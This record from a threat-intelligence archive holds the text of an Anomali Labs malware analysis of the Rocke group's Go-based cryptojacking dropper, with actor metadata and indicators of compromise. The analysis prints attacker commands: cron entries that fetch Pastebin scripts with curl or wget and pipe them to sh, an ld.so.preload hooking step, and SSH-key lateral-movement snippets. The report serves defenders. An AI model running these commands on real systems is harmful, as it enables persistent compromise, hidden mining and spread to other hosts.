{
	"id": "3b24444d-550b-4be5-98d8-5dfc952aeb98",
	"created_at": "2026-04-06T00:20:19.956703Z",
	"updated_at": "2026-04-10T03:38:10.025217Z",
	"deleted_at": null,
	"sha1_hash": "3922d6284d2b5b34fdc4e9ce031a20db716034b8",
	"title": "Rocke Evolves Its Arsenal With a New Malware Family Written in Golang | Anomali Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3086929,
	"plain_text": "Rocke Evolves Its Arsenal With a New Malware Family Written in Golang | Anomali Labs\r\nBy Anomali Threat Research\r\nArchived: 2026-04-05 13:04:58 UTC\r\nThe “Rocke group”, a Chinese threat actor group who specializes in cryptojacking, has shifted gears on how they’re stealing your cycles.\r\nhttps://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang\r\nPage 1 of 8\r\nSummary\r\nThe “Rocke group”, a Chinese threat actor group who specializes in cryptojacking, has shifted gears on how they’re stealing your cycles. Rocke is actively updating and pushing a new dropper using Pastebin for Command and Control (C2). Updates to the C2 as recent as March 13th, 2019 have been seen, which leads researchers to believe this campaign is ongoing. According to VirusTotal, threat detection of the new dropper is nearly non-existent. The group has been observed in previous campaigns to use the “ld.so.preload” mechanism to hook libc functions. The hooking is used to hide the dropper and the mining software installed by the malware and prevents them from showing up in the “currently running” process list. This tactic is being utilized by the group in this new campaign. 
The miner uses a private mining pool hosted on DigitalOcean, which is a change from the threat actor’s previous tactics.\r\nIntroduction\r\nThe threat actor group, Rocke, was first reported by Cisco Talos in August 2018.[1] On January 17th, 2019, Palo Alto Networks’ Unit 42 reported on a campaign conducted by the group that was active in October 2018, in which the group utilized malware written in Python to orchestrate the infection and spreading of their coinminer.[2] On March 12th, 2019, Anomali Research identified, with high confidence, a new active campaign that we believe is being conducted by Rocke. The objective of the campaign, similar to other Rocke activity, is to drop a miner onto a machine to mine Monero cryptocurrency. This ongoing campaign has extensive Tactics, Techniques and Procedures (TTPs) that overlap with the report published by Unit 42.\r\nThis campaign is different from prior activity because a new dropper was observed being used by Rocke that is written in Go (Golang) instead of Python. Detection of the malware on VirusTotal (VT) is nearly non-existent. Figure 1, below, shows the detections for the most recent sample submitted to VT; only one engine successfully detected it as malicious. The low detection rate of the malware, coupled with the techniques that prevent the Rocke malicious processes from showing up in the running processes of victim machines, raises the possibility that this campaign has been successfully running for weeks.\r\nFigure 1: Scanning results from VirusTotal for one of the malware samples.\r\nTechnical Details\r\nAnalysis of the Dropper\r\nThe samples analyzed are packed with UPX. The UPX header has been modified to break the unpacker provided by the UPX project: the “UPX!” string has been replaced with “LSD!”. Repairing the header is needed to unpack the samples using the unpacker provided by the UPX team.\r\nThe dropper is written in Go (Golang) and the estimated source code structure, based on the decompiler, is shown below:\r\nPackage main: /root/go/src/github.com/hippies/LSD File: main.go goatt Lines: 12 to 17 (5)\r\nThe main execution process can be summarized in the following steps:\r\n1. Deletes “/etc/ld.so.preload” if it exists\r\n2. Gets the PID of the process and writes it to “/tmp/.lsdpid”\r\n3. Uses “chattr -i” to mark the PID file protected so it cannot be modified\r\n4. Copies itself from “/tmp/kthrotlds” to “/usr/sbin/kthrotlds”\r\n5. Turns the modified timestamp on the moved file back 416 days\r\n6. Installs an “init.d” startup script to “/etc/init.d/netdns” and a systemd service script to “/usr/lib/systemd/system/netdns.service”; the modified time is also changed for these files in the same way\r\n7. Enables the service on the compromised system by executing “chkconfig --add netdns” and “systemctl enable netdns”\r\n8. Removes the files “/tmp/kthrotlds” and “/tmp/kintegrityds”\r\n9. Writes code to “/usr/local/lib/libcset.c”\r\n10. Compiles it with “gcc /usr/local/lib/libcset.c -Wall -shared -fPIC -ldl -o /usr/local/lib/libcset.so”\r\n11. If GCC is not installed, tries to install it and recompile: “yum -y install gcc -y||apt-get -y install gcc”\r\n12. Adds the path to the shared object to “/etc/ld.so.preload” and protects the file from modifications\r\n13. Adds persistence through cron by executing echo \"*/10 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh\" | crontab - and by adding “*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh” to “/var/spool/cron/crontabs/root”\r\n14. Checks for updates by checking the version listed at “https://pastebin.com/raw/HWBVXK6H”\r\n15. Installs the Monero miner at “/tmp/kintegrityds” and protects it\r\n16. The miner connects to a private pool hosted on DigitalOcean at IP and port 134.209.104.20:51640\r\nThe malware also starts an “attack” thread that scans for SSH and Redis servers. The malware uses “ident.me” to determine the machine’s external address so it does not attack itself.\r\nCommand and Control\r\nThe malware uses Pastebin for Command and Control (C2). The URL “https://pastebin[.]com/HWBVXK6H” is used to check for the latest version of the malware. If a new version is available, the malware reaches out to “https://pastebin[.]com/yPRSa0ki”. The paste shown below serves as a redirect to the actual setup script.\r\n(curl -fsSL https://pastebin.com/raw/D8E71JBJ||wget -q -O- https://pastebin.com/raw/D8E71JBJ)|sed 's\r\nThe setup script in paste D8E71JBJ, shown below, kills other mining malware and downloads and executes the threat actors’ malware instead. It will also try to use known SSH hosts and the SSH key on the machine to spread laterally.\r\nexport PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin echo \"*/10 * * * * (curl -fsSL https\r\nThe Pastebin profile used by the actor for this campaign is shown below. It can be seen that these pastes were added on February 24th, 2019.\r\nFigure 2: Pastebin profile used by the threat actor.\r\nThe server hosting the malware has the appearance of a free Chinese image hosting site, shown in Figure 3 below. The page asks a visitor to upload their identity photo for the Chinese online shopping website, Taobao.\r\nFigure 3: Image hosting site from which the malware is downloaded.\r\nAccording to the Whois record, shown below, the fake image hosting domain was created on June 21st, 2018. It is also registered by the same email (4592248@gmail[.]com) as another domain that was used in an earlier Rocke campaign, which indicates that the site is likely controlled by the threat group.[3]\r\nDomain Name: SOWCAR.COM Registry Domain ID: 2277522871_DOMAIN_COM-VRSN Registrar WHOIS Server\r\nOverlapping TTPs with previous campaigns\r\nThe current campaign has numerous TTPs overlapping with the previous campaign reported by Unit 42. In both campaigns, the group uses Pastebin for C2 and the C2 system depends on three public pastes: one paste serves the latest version, and one acts as a redirect to the third, which is used to initialize the infection. The redirect uses either “cURL” or “wget” to fetch the initialization script from the paste. The paste is “piped” to either “bash” or “sh” after some cleanup. In addition to the similarities in the structures, the user account names also appear to follow a similar pattern. In this campaign the username is “SYSTEMTEN”, while the last campaign’s username was “SYSTEAM”. The first five characters of the username (SYSTE) may be an indication of other Rocke activity.\r\nThe filenames of the payloads are also similar in the two latest reported campaigns. Below are the URLs used to download the payload in this campaign and in the campaign reported by Unit 42. The filenames have the same structure, with some of the numbers overlapping.\r\nhttp://sowcar.com/t6/678/1552060180x1822611359.jpg https://master.minerxmr.ru/2/1551434778x272832903\r\nThe malware uses cron for persistence. The similar crontab entries are shown below. The only difference between the entries is the ID of the paste used.\r\nCron jobs created by the Python version of the malware:\r\n\"*/10 * * * * root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/\r\nCron jobs created by the Go version of the malware:\r\n*/10 * * * * root (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/ra\r\nIn this campaign, the threat actor also uses “init” and “systemd” services for persistence. The name of the service is “netdns”. Below is a snippet from the setup script used by Rocke in a previous campaign that also uses the service called netdns. After the file is created, the access and modification times are changed before the file is marked as non-modifiable. The same technique is used by the new malware written in Go.\r\ncurl -fsSL --connect-timeout 120 https://master.minerxmr.ru/Pep/4 -o /etc/init.d/netdns||wget https\r\nThe spreading technique observed by Anomali researchers is the same one used in previous campaigns. The malware in both the previous and the ongoing campaign assumes that it has root-level access on the machine. Below are code snippets from the current campaign and the campaign reported by Unit 42, where the threat actor uses SSH keys and known hosts, if they are available, to infect other machines.\r\nLast campaign\r\nif [ -f /root/.ssh/known_hosts ] \u0026\u0026 [ -f /root/.ssh/id_rsa.pub ]; then for h in $\r\nCurrent campaign\r\nif [ -f /root/.ssh/known_hosts ] \u0026\u0026 [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE \"([0-9]{\r\nIn addition to the propagation over SSH, the new malware tries to compromise Redis servers, just like the Python-based malware.\r\nThere is also overlap of infrastructure. The email used to register the sowcar[.]com domain also registered thyrsi[.]com. This domain was reported on and linked to the same threat group in a report by Cisco Talos in December 2018. The domains registered by this email address are shown in the figure below.\r\nFigure 4: Domains registered by the same email address.\r\nConclusion\r\nAnomali Labs has detected a new campaign by the threat group Rocke. In this campaign, the group has changed from using Python-based malware to malware written in Golang. Detection of this new malware is nearly non-existent. In addition, the group uses a private mining pool to reduce the risk of being detected.\r\nMitre ATT\u0026CK\r\nT1190 Exploit Public-Facing Application\r\nT1078 Valid Accounts\r\nT1168 Local Job Scheduling\r\nT1110 Brute Force\r\nT1222 File Permissions Modification\r\nT1021 Remote Services\r\nT1064 Scripting\r\nT1045 Software Packing\r\nT1071 Standard Application Layer Protocol\r\nT1099 Timestomp\r\nT1055 Process Injection\r\nT1036 Masquerading\r\nIOCs\r\nURLs\r\nhttps://pastebin[.]com/raw/yPRSa0ki https://pastebin[.]com/raw/wDBa7jCQ https://pastebin[.]com/raw/D\r\nSHA256\r\n029e79bc2e232d21b61c09463dd89e515606b7b9df771572627394cbe59e1cbd 93efdee9def596b93517699958e7a5c3f0b\r\nMining pool\r\n134.209.104.20:51640\r\nEndnotes\r\n[1] David Liebenberg, “Rocke: The Champion of Monero Miners,” Talos Blog, published August 30, 2018, accessed March 14, 2019.\r\n[2] Xingyu Jin and Claud Xiao, “Malware Used by “Rocke” Group Evolves to Evade Detection by Cloud Security Products,” Palo Alto Networks, published January 17, 2019, accessed March 14, 2019.\r\n[3] David Liebenberg and Andrew Williams, “Connecting the dots between recently active cryptominers,” Talos Blog, published December 18, 2018, accessed March 14, 2019.\r\nSource: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"
	],
	"report_names": [
		"rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"
	],
	"threat_actors": [
		{
			"id": "7c053836-8f50-4d40-bc5c-7088967e1b57",
			"created_at": "2022-10-25T16:07:24.549525Z",
			"updated_at": "2026-04-10T02:00:05.03048Z",
			"deleted_at": null,
			"main_name": "Rocke",
			"aliases": [
				"Aged Libra",
				"G0106",
				"Iron Group",
				"Rocke"
			],
			"source_name": "ETDA:Rocke",
			"tools": [
				"Godlua",
				"Kerberods",
				"LSD",
				"Pro-Ocean",
				"Xbash"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb",
			"created_at": "2023-01-06T13:46:38.228042Z",
			"updated_at": "2026-04-10T02:00:02.883048Z",
			"deleted_at": null,
			"main_name": "APT1",
			"aliases": [
				"PLA Unit 61398",
				"Comment Crew",
				"Byzantine Candor",
				"Comment Group",
				"GIF89a",
				"Group 3",
				"TG-8223",
				"Brown Fox",
				"ShadyRAT",
				"G0006",
				"COMMENT PANDA"
			],
			"source_name": "MISPGALAXY:APT1",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "905eabd9-2b7f-483d-86bd-0c72f96b4162",
			"created_at": "2023-01-06T13:46:39.02749Z",
			"updated_at": "2026-04-10T02:00:03.185957Z",
			"deleted_at": null,
			"main_name": "Rocke",
			"aliases": [
				"Aged Libra"
			],
			"source_name": "MISPGALAXY:Rocke",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "0b02af5f-2027-42b7-a6f2-51e2fd49ba7f",
			"created_at": "2022-10-25T15:50:23.360509Z",
			"updated_at": "2026-04-10T02:00:05.337702Z",
			"deleted_at": null,
			"main_name": "Rocke",
			"aliases": [
				"Rocke"
			],
			"source_name": "MITRE:Rocke",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b",
			"created_at": "2022-10-25T16:07:23.480196Z",
			"updated_at": "2026-04-10T02:00:04.626125Z",
			"deleted_at": null,
			"main_name": "Comment Crew",
			"aliases": [
				"APT 1",
				"BrownFox",
				"Byzantine Candor",
				"Byzantine Hades",
				"Comment Crew",
				"Comment Panda",
				"G0006",
				"GIF89a",
				"Group 3",
				"Operation Oceansalt",
				"Operation Seasalt",
				"Operation Siesta",
				"Shanghai Group",
				"TG-8223"
			],
			"source_name": "ETDA:Comment Crew",
			"tools": [
				"Auriga",
				"Cachedump",
				"Chymine",
				"CookieBag",
				"Darkmoon",
				"GDOCUPLOAD",
				"GLOOXMAIL",
				"GREENCAT",
				"Gen:Trojan.Heur.PT",
				"GetMail",
				"Hackfase",
				"Hacksfase",
				"Helauto",
				"Kurton",
				"LETSGO",
				"LIGHTBOLT",
				"LIGHTDART",
				"LOLBAS",
				"LOLBins",
				"LONGRUN",
				"Living off the Land",
				"Lslsass",
				"MAPIget",
				"ManItsMe",
				"Mimikatz",
				"MiniASP",
				"Oceansalt",
				"Pass-The-Hash Toolkit",
				"Poison Ivy",
				"ProcDump",
				"Riodrv",
				"SPIVY",
				"Seasalt",
				"ShadyRAT",
				"StarsyPound",
				"TROJAN.COOKIES",
				"TROJAN.FOXY",
				"TabMsgSQL",
				"Tarsip",
				"Trojan.GTALK",
				"WebC2",
				"WebC2-AdSpace",
				"WebC2-Ausov",
				"WebC2-Bolid",
				"WebC2-Cson",
				"WebC2-DIV",
				"WebC2-GreenCat",
				"WebC2-Head",
				"WebC2-Kt3",
				"WebC2-Qbp",
				"WebC2-Rave",
				"WebC2-Table",
				"WebC2-UGX",
				"WebC2-Yahoo",
				"Wordpress Bruteforcer",
				"bangat",
				"gsecdump",
				"pivy",
				"poisonivy",
				"pwdump",
				"zxdosml"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434819,
	"ts_updated_at": 1775792290,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3922d6284d2b5b34fdc4e9ce031a20db716034b8.pdf",
		"text": "https://archive.orkl.eu/3922d6284d2b5b34fdc4e9ce031a20db716034b8.txt",
		"img": "https://archive.orkl.eu/3922d6284d2b5b34fdc4e9ce031a20db716034b8.jpg"
	}
}